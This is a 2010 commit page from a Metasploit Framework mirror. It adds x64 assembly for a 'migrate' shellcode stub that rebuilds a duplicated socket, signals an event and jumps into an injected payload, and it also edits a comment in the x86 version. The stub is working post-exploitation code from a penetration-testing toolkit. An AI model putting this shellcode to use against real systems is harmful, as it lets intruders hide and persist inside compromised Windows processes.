infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Commit the new x64 migrate stub. Compatible with x64->x64 migration (and x86->x64 migration once the remote thread issue is resolved) 

git-svn-id: file:///home/svn/framework3/trunk@8163 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Stephen Fewer 2010-01-19 18:39:56 +00:00
parent d85c801b11
commit f3fd2eae80
2 changed files with 73 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

71
external/source/shellcode/windows/x64/src/single/migrate.asm vendored Normal file
View File

@ -0,0 +1,71 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, 2003, XP
; Architecture: x64
; Version: 1.0 (Jan 2010)
; Size: 306 bytes
; Build: >build.py migrate
;-----------------------------------------------------------------------------;
; typedef struct MigrateContext
; {
; union
; {
; HANDLE hEvent;
; BYTE bPadding1[8];
; } e;
; union
; {
; LPVOID lpPayload;
; BYTE bPadding2[8];
; } p;
; WSAPROTOCOL_INFO info;
; } MIGRATECONTEXT, * LPMIGRATECONTEXT;
[BITS 64]
[ORG 0]
cld ; Clear the direction flag.
mov rsi, rcx ; RCX is a pointer to our migration stub context
sub rsp, 0x2000 ; Alloc some space on stack
and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
call start ; Call start, this pushes the address of 'api_call' onto the stack.
delta: ;
%include "./src/block/block_api.asm"
start: ;
pop rbp ; Pop off the address of 'api_call' for calling later.
; setup the structures we need on the stack...
mov r14, 'ws2_32' ;
push r14 ; Push the bytes 'ws2_32',0,0 onto the stack.
mov rcx, rsp ; save pointer to the "ws2_32" string for LoadLibraryA call.
sub rsp, 408+8 ; alloc sizeof( struct WSAData ) bytes for the WSAData structure (+8 for alignment)
mov r13, rsp ; save pointer to the WSAData structure for WSAStartup call.
sub rsp, 0x28 ; alloc space for function calls
; perform the call to LoadLibraryA...
mov r10d, 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call rbp ; LoadLibraryA( "ws2_32" )
; perform the call to WSAStartup...
mov rdx, r13 ; second param is a pointer to this stuct
push byte 2 ;
pop rcx ; set the param for the version requested
mov r10d, 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
call rbp ; WSAStartup( 2, &WSAData );
; perform the call to WSASocketA...
xor r8, r8 ; we do not specify a protocol
push r8 ; push zero for the flags param.
push r8 ; push null for reserved parameter
lea r9, [rsi+16] ; We specify the WSAPROTOCOL_INFO structure from the MigrateContext
push byte 1 ;
pop rdx ; SOCK_STREAM == 1
push byte 2 ;
pop rcx ; AF_INET == 2
mov r10d, 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
call rbp ; WSASocketA( AF_INET, SOCK_STREAM, 0, &info, 0, 0 );
mov rdi, rax ; save the socket for later
; perform the call to SetEvent...
mov rcx, qword [rsi] ; Set the first parameter to the migrate event
mov r10d, 0x35269F1D ; hash( "kernel32.dll", "SetEvent" )
call rbp ; SetEvent( hEvent );
; perform the call to the payload...
call qword [rsi+8] ; Call the payload...

3
external/source/shellcode/windows/x86/src/single/migrate.asm vendored
View File

@ -1,6 +1,7 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Architecture: x86
; Version: 1.0 (Jan 2010)
; Size: 219 bytes
; Build: >build.py migrate
@ -56,7 +57,7 @@ start: ;
inc eax ;
push eax ; Push AF_INET
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, &info, 0, 0 );
xchg edi, eax ; Save the socket for later, we don't care about the value of eax after this
push dword [esi] ; Push the event